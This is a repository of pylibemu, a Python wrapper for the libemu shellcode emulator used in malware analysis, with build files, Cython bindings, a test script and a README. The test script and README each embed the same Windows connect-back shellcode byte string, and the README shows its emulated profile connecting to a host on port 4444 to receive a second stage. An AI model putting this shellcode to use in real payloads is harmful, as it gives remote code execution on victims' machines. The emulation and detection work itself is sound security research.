├── setup.cfg ├── MANIFEST ├── MANIFEST.in ├── .travis.yml ├── .gitignore ├── setup.py ├── tests ├── cpu_mem_test.py └── sctest.py ├── README.rst ├── src ├── pylibemu.pxd └── pylibemu.pyx └── LICENSE.txt /setup.cfg: -------------------------------------------------------------------------------- 1 | [metadata] 2 | description_file = README.md 3 | -------------------------------------------------------------------------------- /MANIFEST: -------------------------------------------------------------------------------- 1 | # file GENERATED by distutils, do NOT edit 2 | LICENSE.txt 3 | setup.cfg 4 | setup.py 5 | src/pylibemu.c 6 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include LICENSE.txt 2 | include run_pykg_config.py 3 | recursive-include docs *.html *.css *.png *.gif 4 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | dist: jammy 2 | sudo: required 3 | language: python 4 | python: 5 | - "pypy" 6 | - "pypy3" 7 | - "3.7" 8 | - "3.8" 9 | - "3.9" 10 | - "3.10" 11 | before_install: 12 | - git clone https://github.com/buffer/libemu.git 13 | - cd libemu 14 | - autoreconf -v -i 15 | - ./configure 16 | - sudo make install 17 | - cd - 18 | install: 19 | - sudo python setup.py install 20 | script: 21 | - echo "Build done" 22 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Copying and distribution of this file, with or without modification, 2 | # are permitted in any medium without royalty provided this notice is 3 | # preserved. This file is offered as-is, without any warranty. 4 | # Names of contributors must not be used to endorse or promote products 5 | # derived from this file without specific prior written permission. 6 | 7 | # Generated files 8 | *.pyc 9 | 10 | # Generated directories 11 | build 12 | release 13 | dist 14 | 15 | # IDE 16 | .project 17 | .pydevproject 18 | 19 | # Archives 20 | *.zip 21 | *.tar.* 22 | *.tgz 23 | *.gz 24 | *.bz2 25 | *.xz 26 | *.lz 27 | *.lzma 28 | *.7z 29 | *.dll 30 | *.deb 31 | *.rpm 32 | *.apk 33 | *.exe 34 | *.msi 35 | *.dmg 36 | *.ipa 37 | 38 | # OS specific useless files 39 | thumbs.db 40 | Thumbs.db 41 | __MACOSX/ 42 | __MAC_OS_X/ 43 | __OSX/ 44 | __OS_X/ 45 | __WINDOWS/ 46 | __MS_WINDOWS/ 47 | .DS_Store 48 | .directory 49 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup 2 | from setuptools.extension import Extension 3 | from setuptools.command.build_clib import build_clib 4 | 5 | try: 6 | from Cython.Distutils import build_ext 7 | has_cython = True 8 | except ImportError: 9 | has_cython = False 10 | 11 | 12 | # sourcefiles = ['src/pylibemu.pyx'] 13 | # cmdclass = { 'build_ext' : build_ext, 'build_clib' : build_clib } 14 | sourcefiles = ['src/pylibemu.c'] 15 | cmdclass = {'build_clib' : build_clib} 16 | 17 | 18 | setup( 19 | name = "pylibemu", 20 | packages = [], 21 | version = "1.0", 22 | description = "Libemu Python wrapper", 23 | url = "https://github.com/buffer/pylibemu", 24 | author = "Angelo Dell'Aera", 25 | author_email = "angelo.dellaera@honeynet.org", 26 | maintainer = "Angelo Dell'Aera", 27 | maintainer_email = "angelo.dellaera@honeynet.org", 28 | classifiers = [ 29 | "Programming Language :: Cython", 30 | "Development Status :: 4 - Beta", 31 | "Environment :: Console", 32 | "Intended Audience :: Developers", 33 | "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", 34 | "Operating System :: Unix", 35 | "Topic :: Software Development :: Libraries :: Python Modules", 36 | "Topic :: Security", 37 | ], 38 | cmdclass = cmdclass, 39 | keywords = ['libemu', 'pylibemu', 'shellcode'], 40 | ext_modules = [Extension("pylibemu", 41 | sources = sourcefiles, 42 | libraries = ["emu"] 43 | )], 44 | ) 45 | -------------------------------------------------------------------------------- /tests/cpu_mem_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # cpu_mem_test.py 4 | # 5 | # Copyright(c) 2011-2022 Angelo Dell'Aera 6 | # 7 | # This program is free software; you can redistribute it and/or modify 8 | # it under the terms of the GNU General Public License version 2 as 9 | # published by the Free Software Foundation. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program; if not, write to the Free Software 18 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, 19 | # MA 02111-1307 USA 20 | 21 | import pylibemu 22 | import logging 23 | 24 | log = logging.getLogger("pylibemu") 25 | 26 | regs32 = ('eax', 27 | 'ecx', 28 | 'edx', 29 | 'ebx', 30 | 'esp', 31 | 'ebp', 32 | 'esi', 33 | 'edi') 34 | 35 | regs16 = ('ax', 36 | 'cx', 37 | 'dx', 38 | 'bx', 39 | 'sp', 40 | 'bp', 41 | 'si', 42 | 'di') 43 | 44 | regs8 = ('al', 45 | 'cl', 46 | 'dl', 47 | 'bl', 48 | 'ah', 49 | 'ch', 50 | 'dh', 51 | 'bh') 52 | 53 | shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" 54 | shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" 55 | shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" 56 | shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" 57 | shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" 58 | shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" 59 | shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" 60 | shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" 61 | shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" 62 | shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" 63 | shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" 64 | shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" 65 | shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" 66 | 67 | emulator = pylibemu.Emulator() 68 | offset = emulator.shellcode_getpc_test(shellcode) 69 | 70 | for i in range(0, 7): 71 | log.warning("%s => %s" % (regs32[i], hex(emulator.cpu_reg32_get(i)), )) 72 | log.warning("%s => %s" % (regs16[i], hex(emulator.cpu_reg16_get(i)), )) 73 | log.warning("%s => %s" % (regs8[i] , hex(emulator.cpu_reg8_get(i)) , )) 74 | 75 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 76 | 77 | emulator.memory_write_dword(emulator.cpu_reg32_get(i), 0x41424344) 78 | 79 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 80 | 81 | dword = emulator.memory_read_dword(emulator.cpu_reg32_get(i)) 82 | assert dword == 0x41424344 83 | 84 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 85 | 86 | word = emulator.memory_read_word(emulator.cpu_reg32_get(i)) 87 | assert word == 0x4344 88 | 89 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 90 | 91 | byte = emulator.memory_read_byte(emulator.cpu_reg32_get(i)) 92 | assert byte == 0x44 93 | 94 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 95 | 96 | emulator.memory_segment_select(5) 97 | assert emulator.memory_segment_get() == 5 98 | 99 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 100 | 101 | eip = emulator.cpu_eip_get() 102 | log.warning(hex(eip)) 103 | 104 | dword = emulator.memory_read_dword(eip) 105 | log.warning(hex(dword)) 106 | 107 | word = emulator.memory_read_word(eip) 108 | log.warning(hex(word)) 109 | 110 | byte = emulator.memory_read_byte(eip) 111 | log.warning(hex(byte)) 112 | 113 | block = emulator.memory_read_block(eip, 4) 114 | #log.warning('0x' + ''.join(["%02x" % ord(x) for x in block[::-1]])) 115 | 116 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8')) 117 | 118 | emulator.memory_write_dword(emulator.cpu_reg32_get(i), 0x00414243) 119 | s = emulator.memory_read_string(emulator.cpu_reg32_get(i), 4) 120 | log.warning(s.decode('utf-8')) 121 | 122 | log.warning(emulator.env_w32_hook_check()) 123 | -------------------------------------------------------------------------------- /README.rst: -------------------------------------------------------------------------------- 1 | 2 | Pylibemu |version badge| |downloads badge| 3 | ============================================================================ 4 | 5 | .. |version badge| image:: https://img.shields.io/pypi/v/pylibemu.svg 6 | :target: https://pypi.python.org/pypi/pylibemu/ 7 | .. |downloads badge| image:: https://img.shields.io/pypi/dm/pylibemu.svg 8 | :target: https://pypi.python.org/pypi/pylibemu/ 9 | 10 | Pylibemu is a wrapper for the Libemu library (https://github.com/buffer/libemu). 11 | 12 | 13 | Requirements 14 | ============ 15 | 16 | - Python 2.5+ or Python 3.6+ (read installation notes) 17 | - Libemu 18 | 19 | 20 | Installation (Python 3) 21 | ======================= 22 | 23 | Pylibemu > 0.5.8 does not include Libemu submodule anymore so you are required to 24 | install Libemu before installing Pylibemu. 25 | 26 | To install Libemu, just execute: 27 | 28 | .. code-block:: console 29 | 30 | $ git clone https://github.com/buffer/libemu.git 31 | $ cd libemu 32 | $ autoreconf -v -i 33 | $ ./configure 34 | $ make 35 | $ sudo make install 36 | 37 | Once Libemu is correctly installed, just execute: 38 | 39 | .. code-block:: console 40 | 41 | $ sudo pip install pylibemu 42 | 43 | 44 | Installation (Python 2) 45 | ======================= 46 | 47 | Pylibemu 0.5.8 is the last version supporting Python 2. 48 | 49 | To install Pylibemu, just execute: 50 | 51 | .. code-block:: console 52 | 53 | $ sudo pip install pylibemu==0.5.8 54 | 55 | 56 | Usage 57 | ===== 58 | 59 | .. code-block:: pycon 60 | 61 | >>> import pylibemu 62 | >>> shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" 63 | >>> shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" 64 | >>> shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" 65 | >>> shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" 66 | >>> shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" 67 | >>> shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" 68 | >>> shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" 69 | >>> shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" 70 | >>> shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" 71 | >>> shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" 72 | >>> shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" 73 | >>> shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" 74 | >>> shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" 75 | >>> emulator = pylibemu.Emulator() 76 | >>> offset = emulator.shellcode_getpc_test(shellcode) 77 | >>> offset 78 | 4 79 | >>> emulator.prepare(shellcode, offset) 80 | >>> emulator.test() 81 | 0 82 | >>> print emulator.emu_profile_output 83 | HMODULE LoadLibraryA ( 84 | LPCTSTR lpFileName = 0x0012fe90 => 85 | = "ws2_32"; 86 | ) = 0x71a10000; 87 | int WSAStartup ( 88 | WORD wVersionRequested = 2; 89 | LPWSADATA lpWSAData = 1244272; 90 | ) = 0; 91 | SOCKET WSASocket ( 92 | int af = 2; 93 | int type = 1; 94 | int protocol = 0; 95 | LPWSAPROTOCOL_INFO lpProtocolInfo = 0; 96 | GROUP g = 0; 97 | DWORD dwFlags = 0; 98 | ) = 66; 99 | int connect ( 100 | SOCKET s = 66; 101 | struct sockaddr_in * name = 0x0012fe88 => 102 | struct = { 103 | short sin_family = 2; 104 | unsigned short sin_port = 23569 (port=4444); 105 | struct in_addr sin_addr = { 106 | unsigned long s_addr = 339060928 (host=192.168.53.20); 107 | }; 108 | char sin_zero = " "; 109 | }; 110 | int namelen = 16; 111 | ) = 0; 112 | int recv ( 113 | SOCKET s = 66; 114 | char * buf = 0x0012fe88 => 115 | none; 116 | int len = 3072; 117 | int flags = 0; 118 | ) = 3072; 119 | 120 | >>> emulator.emu_profile_truncated 121 | False 122 | 123 | 124 | The new Emulator method 'run' was introduced in Pylibemu 0.1.3 which allows not to 125 | worry about details. Moreover the new Emulator attribute ``offset`` allows to get such 126 | information if needed. 127 | 128 | .. code-block:: pycon 129 | 130 | >>> emulator = pylibemu.Emulator() 131 | >>> emulator.run(shellcode) 132 | 0 133 | >>> emulator.offset 134 | 4 135 | >>> print emulator.emu_profile_output 136 | HMODULE LoadLibraryA ( 137 | LPCTSTR = 0x01a3f990 => 138 | = "ws2_32"; 139 | ) = 1906376704; 140 | int WSAStartup ( 141 | WORD wVersionRequested = 2; 142 | LPWSADATA lpWSAData = 1244272; 143 | ) = 0; 144 | SOCKET WSASocket ( 145 | int af = 2; 146 | int type = 1; 147 | int protocol = 0; 148 | LPWSAPROTOCOL_INFO lpProtocolInfo = 0; 149 | GROUP g = 0; 150 | DWORD dwFlags = 0; 151 | ) = 66; 152 | int connect ( 153 | SOCKET s = 66; 154 | struct sockaddr_in * name = 0x0012fe88 => 155 | struct = { 156 | short sin_family = 2; 157 | unsigned short sin_port = 23569 (port=4444); 158 | struct in_addr sin_addr = { 159 | unsigned long s_addr = 339060928 (host=192.168.53.20); 160 | }; 161 | char sin_zero = " "; 162 | }; 163 | int namelen = 16; 164 | ) = 0; 165 | int recv ( 166 | SOCKET s = 66; 167 | char * = 0x01a40870 => 168 | none; 169 | int len = 3072; 170 | int flags = 0; 171 | ) = 3072; 172 | 173 | >>> emulator.emu_profile_truncated 174 | False 175 | 176 | 177 | The Emulator accepts the optional parameter ``output_size`` which defines how much memory 178 | will be reserved for storing the emulation profile dump. By default, its size is 1MB but 179 | it be can changed in two possible ways 180 | 181 | .. code-block:: pycon 182 | 183 | >>> emulator = pylibemu.Emulator(1024) 184 | 185 | >>> emulator = pylibemu.Emulator() 186 | >>> emulator.set_output_size(1024) 187 | 188 | If the reserved memory is not enough to contain the entire dump, the dump will be truncated 189 | and the Emulator attribute ``emu_profile_truncated`` will be set to True. This approach is 190 | needed in order not to penalize performances while analyzing some shellcodes which may produce 191 | several MBs dumps (such as the Metasploit windows/download_exec). If the entire dump is needed 192 | a really simple approach could be to check the ``emu_profile_truncated`` attribute after the 193 | shellcode emulation test, increase the reserved memory through the Emulator ``set_output_size`` 194 | method and subsequently run the shellcode emulation test again as shown above. 195 | 196 | 197 | License information 198 | =================== 199 | 200 | Copyright (C) 2011-2023 Angelo Dell'Aera 201 | 202 | License: GNU General Public License, version 2 203 | -------------------------------------------------------------------------------- /src/pylibemu.pxd: -------------------------------------------------------------------------------- 1 | # pylibemu.pxd 2 | # 3 | # Copyright(c) 2011-2022 Angelo Dell'Aera 4 | # 5 | # This program is free software; you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License version 2 as 7 | # published by the Free Software Foundation. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program; if not, write to the Free Software 16 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, 17 | # MA 02111-1307 USA 18 | 19 | #cython: language_level=3 20 | 21 | from libc.stdint cimport int16_t, int32_t, uint8_t, uint16_t, uint32_t 22 | cimport cpython 23 | 24 | 25 | cdef extern from *: 26 | ctypedef char* const_char_ptr "const char*" 27 | 28 | 29 | cdef extern from "stdarg.h": 30 | ctypedef struct va_list: 31 | pass 32 | 33 | ctypedef struct fake_type: 34 | pass 35 | 36 | void va_start(va_list, void *arg) 37 | void* va_arg(va_list, fake_type) 38 | void va_end(va_list) 39 | 40 | fake_type void_ptr_type "void *" 41 | fake_type char_ptr_type "char *" 42 | fake_type int_type "int" 43 | 44 | 45 | cdef extern from "stdio.h": 46 | int snprintf(char *, size_t, char *, ...) 47 | 48 | 49 | cdef extern from "stdlib.h": 50 | void free(void* ) 51 | void *malloc(size_t) 52 | 53 | 54 | cdef extern from "string.h": 55 | char *strncat(char *, char *, size_t) 56 | void *memset(void *, int , size_t) 57 | 58 | 59 | cdef extern from "netinet/in.h": 60 | ctypedef struct c_in_addr "struct in_addr": 61 | pass 62 | 63 | 64 | cdef extern from "arpa/inet.h": 65 | uint16_t ntohs(uint16_t) 66 | char *inet_ntoa(c_in_addr) 67 | 68 | 69 | cdef extern from "emu/emu_string.h": 70 | ctypedef struct c_emu_string "struct emu_string": 71 | uint32_t size 72 | void *data 73 | uint32_t allocated 74 | 75 | 76 | cdef extern from "emu/emu_memory.h": 77 | ctypedef struct c_emu_memory "struct emu_memory": 78 | pass 79 | 80 | ctypedef enum c_emu_segment "enum emu_segment": 81 | s_cs = 0 82 | s_ss = 1 83 | s_ds = 2 84 | s_es = 3 85 | s_fs = 4 86 | s_gs = 5 87 | 88 | int32_t emu_memory_write_byte(c_emu_memory *m, uint32_t addr, uint8_t byte) 89 | int32_t emu_memory_write_word(c_emu_memory *m, uint32_t addr, uint16_t word) 90 | int32_t emu_memory_write_dword(c_emu_memory *m, uint32_t addr, uint32_t dword) 91 | int32_t emu_memory_write_block(c_emu_memory *m, uint32_t addr, void *src, size_t _len) 92 | 93 | int32_t emu_memory_read_byte(c_emu_memory *m, uint32_t addr, uint8_t *byte) 94 | int32_t emu_memory_read_word(c_emu_memory *m, uint32_t addr, uint16_t *word) 95 | int32_t emu_memory_read_dword(c_emu_memory *m, uint32_t addr, uint32_t *dword) 96 | int32_t emu_memory_read_block(c_emu_memory *m, uint32_t addr, void *dest, size_t _len) 97 | int32_t emu_memory_read_string(c_emu_memory *m, uint32_t addr, c_emu_string *s, uint32_t maxsize) 98 | 99 | void emu_memory_segment_select(c_emu_memory *m, c_emu_segment s) 100 | c_emu_segment emu_memory_segment_get(c_emu_memory *m) 101 | 102 | 103 | cdef extern from "emu/environment/emu_profile.h": 104 | cdef enum emu_profile_argument_render: 105 | render_none 106 | render_ptr 107 | render_int 108 | render_short 109 | render_struct 110 | render_string 111 | render_bytea 112 | render_ip 113 | render_port 114 | render_array 115 | 116 | ctypedef enum c_emu_profile_argument_render "enum emu_profile_argument_render": 117 | pass 118 | 119 | ctypedef struct c_emu_profile_argument "struct emu_profile_argument" 120 | 121 | ctypedef struct c_emu_profile_argument_root "struct emu_profile_argument_root": 122 | pass 123 | 124 | ctypedef struct c_bytea: 125 | unsigned char *data 126 | uint32_t size 127 | 128 | ctypedef struct c_tstruct: 129 | c_emu_profile_argument_root *arguments 130 | 131 | ctypedef struct c_tptr: 132 | c_emu_profile_argument *ptr 133 | uint32_t addr 134 | 135 | ctypedef union c_emu_profile_argument_value: 136 | int32_t tint 137 | int16_t tshort 138 | char *tchar 139 | c_bytea bytea 140 | c_tstruct tstruct 141 | c_tptr tptr 142 | 143 | ctypedef struct c_emu_profile_argument "struct emu_profile_argument": 144 | emu_profile_argument_render render 145 | c_emu_profile_argument_value value 146 | char *argname 147 | char *argtype 148 | 149 | ctypedef struct c_emu_profile_function "struct emu_profile_function": 150 | emu_profile_argument_render retval 151 | char *fnname 152 | c_emu_profile_argument_root *arguments 153 | c_emu_profile_argument *return_value 154 | 155 | ctypedef struct c_emu_profile_function_root "struct emu_profile_function_root": 156 | pass 157 | 158 | ctypedef struct c_emu_profile_function "struct emu_profile_function": 159 | pass 160 | 161 | ctypedef struct c_emu_profile "struct emu_profile": 162 | c_emu_profile_function_root *functions 163 | 164 | c_emu_profile *emu_profile_new() 165 | void emu_profile_free(c_emu_profile *profile) 166 | void emu_profile_debug(c_emu_profile *profile) 167 | c_emu_profile_argument *emu_profile_arguments_first(c_emu_profile_argument_root *root) 168 | c_emu_profile_argument *emu_profile_arguments_next(c_emu_profile_argument *argument) 169 | bint emu_profile_arguments_istail(c_emu_profile_argument *argument) 170 | void emu_profile_argument_debug(c_emu_profile_argument *argument, int indent) 171 | c_emu_profile_function *emu_profile_functions_first(c_emu_profile_function_root *root) 172 | c_emu_profile_function *emu_profile_functions_next(c_emu_profile_function *function) 173 | bint emu_profile_functions_istail(c_emu_profile_function *function) 174 | void emu_profile_function_debug(c_emu_profile_function *function) 175 | 176 | 177 | cdef extern from "emu/emu.h": 178 | ctypedef struct c_emu "struct emu": 179 | pass 180 | 181 | 182 | cdef extern from "emu/emu_cpu_data.h": 183 | ctypedef struct c_emu_instruction "struct emu_instruction": 184 | pass 185 | 186 | ctypedef struct c_emu_cpu_instruction_info "struct emu_cpu_instruction_info": 187 | pass 188 | 189 | ctypedef struct c_emu_track_and_source "struct emu_track_and_source": 190 | pass 191 | 192 | ctypedef struct c_emu_cpu "struct emu_cpu": 193 | c_emu *emu 194 | c_emu_memory *mem 195 | uint32_t debugflags 196 | uint32_t eip 197 | uint32_t eflags 198 | uint32_t reg[8] 199 | uint16_t *reg16[8] 200 | uint8_t *reg8[8] 201 | c_emu_instruction instr 202 | c_emu_cpu_instruction_info *cpu_instr_info 203 | uint32_t last_fpu_instr[2] 204 | char *instr_string 205 | bint repeat_current_instr 206 | c_emu_track_and_source *tracking 207 | 208 | 209 | cdef extern from "emu/emu.h": 210 | ctypedef struct c_emu_logging "struct emu_logging": 211 | pass 212 | 213 | ctypedef struct c_emu_fpu "struct emu_fpu": 214 | pass 215 | 216 | c_emu *emu_new() 217 | void emu_free(c_emu *e) 218 | c_emu_memory *emu_memory_get(c_emu *e) 219 | c_emu_logging *emu_logging_get(c_emu *e) 220 | c_emu_cpu *emu_cpu_get(c_emu *e) 221 | int emu_errno(c_emu *c) 222 | char *emu_strerror(c_emu *e) 223 | 224 | 225 | cdef extern from "emu/emu_cpu.h": 226 | ctypedef enum c_emu_reg32 "enum emu_reg32": 227 | eax = 0 228 | ecx = 1 229 | edx = 2 230 | ebx = 3 231 | esp = 4 232 | ebp = 5 233 | esi = 6 234 | edi = 7 235 | 236 | ctypedef enum c_emu_reg16 "enum emu_reg16": 237 | ax = 0 238 | cx = 1 239 | dx = 2 240 | bx = 3 241 | sp = 4 242 | bp = 5 243 | si = 6 244 | di = 7 245 | 246 | ctypedef enum c_emu_reg8 "enum emu_reg8": 247 | al = 0 248 | cl = 1 249 | dl = 2 250 | bl = 3 251 | ah = 4 252 | ch = 5 253 | dh = 6 254 | bh = 7 255 | 256 | uint32_t emu_cpu_reg32_get(c_emu_cpu *cpu_p, c_emu_reg32 reg) 257 | void emu_cpu_reg32_set(c_emu_cpu *cpu_p, c_emu_reg32 reg, uint32_t val) 258 | uint16_t emu_cpu_reg16_get(c_emu_cpu *cpu_p, c_emu_reg16 reg) 259 | void emu_cpu_reg16_set(c_emu_cpu *cpu_p, c_emu_reg16 reg, uint16_t val) 260 | uint8_t emu_cpu_reg8_get(c_emu_cpu *cpu_p, c_emu_reg8 reg) 261 | void emu_cpu_reg8_set(c_emu_cpu *cpu_p, c_emu_reg8 reg, uint8_t val) 262 | uint32_t emu_cpu_eflags_get(c_emu_cpu *c) 263 | void emu_cpu_eflags_set(c_emu_cpu *c, uint32_t val) 264 | void emu_cpu_eip_set(c_emu_cpu *c, uint32_t eip) 265 | uint32_t emu_cpu_eip_get(c_emu_cpu *c) 266 | int32_t emu_cpu_parse(c_emu_cpu *c) 267 | int32_t emu_cpu_step(c_emu_cpu *c) 268 | int32_t emu_cpu_run(c_emu_cpu *c) 269 | void emu_cpu_free(c_emu_cpu *c) 270 | void emu_cpu_debug_print(c_emu_cpu *c) 271 | void emu_cpu_debugflag_set(c_emu_cpu *c, uint8_t flag) 272 | void emu_cpu_debugflag_unset(c_emu_cpu *c, uint8_t flag) 273 | 274 | 275 | cdef extern from "emu/environment/linux/emu_env_linux.h": 276 | ctypedef struct c_emu_env_linux "struct emu_env_linux": 277 | pass 278 | 279 | ctypedef struct c_emu_env_linux_syscall "struct emu_env_linux_syscall": 280 | pass 281 | 282 | 283 | cdef extern from "emu/environment/win32/emu_env_w32.h": 284 | ctypedef struct c_emu_env_w32 "struct emu_env_w32": 285 | pass 286 | 287 | 288 | cdef extern from "emu/environment/win32/emu_env_w32_dll_export.h": 289 | ctypedef struct c_emu_env_w32_dll_export "struct emu_env_w32_dll_export": 290 | char *fnname 291 | uint32_t virtualaddr 292 | void *userdata 293 | 294 | 295 | cdef extern from "emu/environment/emu_env.h": 296 | ctypedef struct c_env: 297 | c_emu_env_w32 *win 298 | c_emu_env_linux *lin 299 | 300 | ctypedef struct c_emu_env "struct emu_env": 301 | c_env env 302 | c_emu *emu 303 | c_emu_profile *profile 304 | void *userdata 305 | 306 | ctypedef enum c_emu_env_type "enum emu_env_type": 307 | emu_env_type_win32, 308 | emu_env_type_linux 309 | 310 | ctypedef union c_hook: 311 | c_emu_env_w32_dll_export *win 312 | c_emu_env_linux_syscall *lin 313 | 314 | ctypedef struct c_emu_env_hook "struct emu_env_hook": 315 | c_emu_env_type type 316 | c_hook hook 317 | 318 | c_emu_env *emu_env_new(c_emu *e) 319 | void emu_env_free(c_emu_env *env) 320 | 321 | 322 | cdef extern from "emu/environment/linux/emu_env_linux.h": 323 | c_emu_env_hook *emu_env_linux_syscall_check(c_emu_env *env) 324 | 325 | 326 | cdef extern from "emu/environment/win32/emu_env_w32.h": 327 | int32_t emu_env_w32_load_dll(c_emu_env_w32 *env, char *path) 328 | c_emu_env_hook *emu_env_w32_eip_check(c_emu_env *env) 329 | int32_t emu_env_w32_export_hook(c_emu_env *env, 330 | char *exportname, 331 | uint32_t (*fnhook)(c_emu_env *env, c_emu_env_hook *hook, ...), 332 | void *userdata) 333 | 334 | 335 | cdef extern from "emu/emu_shellcode.h": 336 | int32_t emu_shellcode_test(c_emu *e, uint8_t *data, uint16_t size) 337 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | GNU GENERAL PUBLIC LICENSE 3 | Version 2, June 1991 4 | 5 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 6 | 59 Temple Place, Suite 330, Boston, MA 02111 USA 7 | Everyone is permitted to copy and distribute verbatim copies 8 | of this license document, but changing it is not allowed. 9 | 10 | Preamble 11 | 12 | The licenses for most software are designed to take away your 13 | freedom to share and change it. By contrast, the GNU General Public 14 | License is intended to guarantee your freedom to share and change free 15 | software--to make sure the software is free for all its users. This 16 | General Public License applies to most of the Free Software 17 | Foundation's software and to any other program whose authors commit to 18 | using it. (Some other Free Software Foundation software is covered by 19 | the GNU Library General Public License instead.) You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | this service if you wish), that you receive source code or can get it 26 | if you want it, that you can change the software or use pieces of it 27 | in new free programs; and that you know you can do these things. 28 | 29 | To protect your rights, we need to make restrictions that forbid 30 | anyone to deny you these rights or to ask you to surrender the rights. 31 | These restrictions translate to certain responsibilities for you if you 32 | distribute copies of the software, or if you modify it. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must give the recipients all the rights that 36 | you have. You must make sure that they, too, receive or can get the 37 | source code. And you must show them these terms so they know their 38 | rights. 39 | 40 | We protect your rights with two steps: (1) copyright the software, and 41 | (2) offer you this license which gives you legal permission to copy, 42 | distribute and/or modify the software. 43 | 44 | Also, for each author's protection and ours, we want to make certain 45 | that everyone understands that there is no warranty for this free 46 | software. If the software is modified by someone else and passed on, we 47 | want its recipients to know that what they have is not the original, so 48 | that any problems introduced by others will not reflect on the original 49 | authors' reputations. 50 | 51 | Finally, any free program is threatened constantly by software 52 | patents. We wish to avoid the danger that redistributors of a free 53 | program will individually obtain patent licenses, in effect making the 54 | program proprietary. To prevent this, we have made it clear that any 55 | patent must be licensed for everyone's free use or not licensed at all. 56 | 57 | The precise terms and conditions for copying, distribution and 58 | modification follow. 59 | 60 | GNU GENERAL PUBLIC LICENSE 61 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 62 | 63 | 0. This License applies to any program or other work which contains 64 | a notice placed by the copyright holder saying it may be distributed 65 | under the terms of this General Public License. The "Program", below, 66 | refers to any such program or work, and a "work based on the Program" 67 | means either the Program or any derivative work under copyright law: 68 | that is to say, a work containing the Program or a portion of it, 69 | either verbatim or with modifications and/or translated into another 70 | language. (Hereinafter, translation is included without limitation in 71 | the term "modification".) Each licensee is addressed as "you". 72 | 73 | Activities other than copying, distribution and modification are not 74 | covered by this License; they are outside its scope. The act of 75 | running the Program is not restricted, and the output from the Program 76 | is covered only if its contents constitute a work based on the 77 | Program (independent of having been made by running the Program). 78 | Whether that is true depends on what the Program does. 79 | 80 | 1. You may copy and distribute verbatim copies of the Program's 